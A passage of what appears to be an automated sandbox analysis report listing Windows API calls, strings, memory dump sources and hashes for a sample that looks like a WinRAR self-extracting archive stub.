                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00B535F4), ref: 00B3B9B1
                                                                                                                                                                            • Part of subcall function 00B3D453: _wcslen.LIBCMT ref: 00B3D47D
                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00B3B9B8
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BA24
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                            • Part of subcall function 00B3D4D4: GetDlgItem.USER32(00000068,00B7FCB8), ref: 00B3D4E8
                                                                                                                                                                            • Part of subcall function 00B3D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00B3AF07,00000001,?,?,00B3B7B9,00B5506C,00B7FCB8,00B7FCB8,00001000,00000000,00000000), ref: 00B3D510
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B3D51B
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B535F4), ref: 00B3D529
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D53F
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B3D559
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D59D
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B3D5AB
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D5BA
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D5E1
                                                                                                                                                                            • Part of subcall function 00B3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00B543F4), ref: 00B3D5F0
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B3BA68
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B3BA90
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00B3BAAE
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BAC2
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000011), ref: 00B3BAF4
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B3BB43
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BB7C
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00B3BBD0
                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00B3BBEA
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00B3BC47
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00B3BC6F
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00B3BCB9
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00B3BCE2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3BCEB
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BD1E
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3BD7D
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,00B535F4), ref: 00B3BD94
                                                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 00B3BD9D
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B3BDAC
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B3BDBB
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3BE68
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3BEBE
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3BEE8
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B3BF32
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B3BF4C
                                                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 00B3BF55
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B3BF6B
                                                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 00B3BF85
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00B6A472), ref: 00B3BFA7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B3C007
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3C01A
                                                                                                                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00B3C0BD
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00B3C197
                                                                                                                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B3C1D9
                                                                                                                                                                            • Part of subcall function 00B3C73F: __EH_prolog.LIBCMT ref: 00B3C744
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B3C1FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 3445078344-2238251102

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00B3087C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B3088E
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B308BF
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B30B69
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B30B83
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B30B93
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00B53C7C,00000000), ref: 00B30BB1
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B30C09
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B30C1E
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00B53C7C,?,00000000,?,00000800), ref: 00B30C72
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00B53C7C,00000800,?,00000000,?,00000800), ref: 00B30C9C
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00B53D44,00000800), ref: 00B30CD8
                                                                                                                                                                            • Part of subcall function 00B3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                            • Part of subcall function 00B3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B30D4A
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B30D96
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • AllocConsole.KERNEL32 ref: 00B30D9E
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00B30DA8
                                                                                                                                                                          • AttachConsole.KERNEL32(00000000), ref: 00B30DAF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B30DC4
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B30DD5
                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00B30DDC
                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 00B30DE7
                                                                                                                                                                          • FreeConsole.KERNEL32 ref: 00B30DED
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00B30DF5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                          • API String ID: 1207345701-3298887752
                                                                                                                                                                          • Opcode ID: 3bf955cfb45964c7cbc7e77e7818691b52c43099935a89c2dda5122a04c0b5ba
                                                                                                                                                                          • Instruction ID: 77fbac0e1af3301604d6f14e10812b150c7fd14506b461b3153a3e413ea85ee3
                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf955cfb45964c7cbc7e77e7818691b52c43099935a89c2dda5122a04c0b5ba
                                                                                                                                                                          • Instruction Fuzzy Hash: D8D176B20083449BD321AF50D859B9FBBF8EF85B46F5449DDF98597290CBB0864CCB62

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B3C744
                                                                                                                                                                            • Part of subcall function 00B3B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B3B3FB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3CA0A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3CA13
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3CA71
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3CAB3
                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 00B3CBFB
                                                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 00B3CC36
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B3CC46
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,00B6A472), ref: 00B3CC54
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B3CC7F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                          • API String ID: 2804936435-312220925
                                                                                                                                                                          • Opcode ID: 849922bf998b39d45b9a50b79f9283c34cc857a671b62782cced4e4deced8fc4
                                                                                                                                                                          • Instruction ID: 16815e421ae9cdebe9a04af3a8e5712a384e32713ed38f817cff9c9bafc05d03
                                                                                                                                                                          • Opcode Fuzzy Hash: 849922bf998b39d45b9a50b79f9283c34cc857a671b62782cced4e4deced8fc4
                                                                                                                                                                          • Instruction Fuzzy Hash: D7E150B2900218AADB25DBA0DC85EEE77FCEB04750F1441E6F649E7050EF749F848B64
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B2DA70
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B2DAAC
                                                                                                                                                                            • Part of subcall function 00B2C29A: _wcslen.LIBCMT ref: 00B2C2A2
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                            • Part of subcall function 00B31B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B2BAE9,00000000,?,?,?,0001046A), ref: 00B31BA0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2DDE9
                                                                                                                                                                          • __fprintf_l.LIBCMT ref: 00B2DF1C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                                          • API String ID: 566448164-801612888
                                                                                                                                                                          • Opcode ID: a1d32f9840f78b47afd98d35e099590edbeab03255a878213f3355034fa6a331
                                                                                                                                                                          • Instruction ID: 974ad88602972fc01dfda2bba30981ce9ea595c848b3218ffdef36a7958571f5
                                                                                                                                                                          • Opcode Fuzzy Hash: a1d32f9840f78b47afd98d35e099590edbeab03255a878213f3355034fa6a331
                                                                                                                                                                          • Instruction Fuzzy Hash: EB32D271900228DBDF24EF68E842BEE77E5EF18700F4005AAF91AA7291E771DD85CB50

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                            • Part of subcall function 00B3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                            • Part of subcall function 00B3B568: IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                            • Part of subcall function 00B3B568: TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                            • Part of subcall function 00B3B568: DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          • GetDlgItem.USER32(00000068,00B7FCB8), ref: 00B3D4E8
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00B3AF07,00000001,?,?,00B3B7B9,00B5506C,00B7FCB8,00B7FCB8,00001000,00000000,00000000), ref: 00B3D510
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B3D51B
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00B535F4), ref: 00B3D529
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D53F
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B3D559
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D59D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B3D5AB
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B3D5BA
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B3D5E1
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00B543F4), ref: 00B3D5F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                          • String ID: \
                                                                                                                                                                          • API String ID: 3569833718-2967466578
                                                                                                                                                                          • Opcode ID: 31cf4bf605bb0f75de6df1f3ee0fc856d4bb461ae836bff77d7e1a26a0d8e426
                                                                                                                                                                          • Instruction ID: fe2055bc5365b238a3204efb154fdddf43743f4dca11648c525ecc65c54c0c6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 31cf4bf605bb0f75de6df1f3ee0fc856d4bb461ae836bff77d7e1a26a0d8e426
                                                                                                                                                                          • Instruction Fuzzy Hash: 71318D71145742ABE301DB20AC4AFAB7BECEB96B05F000518F651972E0EF669A08C776

                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B3D7AE
                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00B3D8DE
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00B3D91D
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00B3D959
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00B3D97F
                                                                                                                                                                          • ShowWindow.USER32(?,00000001), ref: 00B3D9E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                          • String ID: .exe$.inf
                                                                                                                                                                          • API String ID: 36480843-3750412487
                                                                                                                                                                          • Opcode ID: a329232928dc075a323e2f0734b8b447d29ede54badc68e756731df4e4b183d4
                                                                                                                                                                          • Instruction ID: cc2777f00e8ef38d148a511f11e77b35a26eabff06be8b185220415bce1c255c
                                                                                                                                                                          • Opcode Fuzzy Hash: a329232928dc075a323e2f0734b8b447d29ede54badc68e756731df4e4b183d4
                                                                                                                                                                          • Instruction Fuzzy Hash: 4951E9745083809AD7319F24F844BAB7BE4EF41B44F2409DEF5C5972A1DB719988C752

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B45695,00B45695,?,?,?,00B4ABAC,00000001,00000001,2DE85006), ref: 00B4A9B5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B4ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00B4AA3B
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B4AB35
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4AB42
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4AB4B
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4AB70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: fbc23780e33368c8a4e5cff156a1ab8a5a672f60226a2651b2be8071ecb95b47
                                                                                                                                                                          • Instruction ID: 8b093685a4a09958f14b9e0217bda74065e0ab937be5e7ee1e094b8ab1fda79c
                                                                                                                                                                          • Opcode Fuzzy Hash: fbc23780e33368c8a4e5cff156a1ab8a5a672f60226a2651b2be8071ecb95b47
                                                                                                                                                                          • Instruction Fuzzy Hash: 0451B172650226ABDB258F64CC81EBFB7EAEB44750F1546A9FC04E6140EB34DE40E692

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B43C35,?,?,00B82088,00000000,?,00B43D60,00000004,InitializeCriticalSectionEx,00B56394,InitializeCriticalSectionEx,00000000), ref: 00B43C03
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 3664257935-2084034818
                                                                                                                                                                          • Opcode ID: 21aa449eb23259db218d4486a6160321fd17e2816701e77670aa5be0f7ffb5a6
                                                                                                                                                                          • Instruction ID: e36cc33d8d5345a5c18660ed9847db10a9518150e985fa4a9516076948f8f135
                                                                                                                                                                          • Opcode Fuzzy Hash: 21aa449eb23259db218d4486a6160321fd17e2816701e77670aa5be0f7ffb5a6
                                                                                                                                                                          • Instruction Fuzzy Hash: BF11CA31A45721ABDB228B589C8175977E4DF01FB1F2901D0E915FB2D0E771EF0096D1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                            • Part of subcall function 00B3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00B3AC2F
                                                                                                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B3AC66
                                                                                                                                                                          • SHGetMalloc.SHELL32(00B68438), ref: 00B3AC70
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
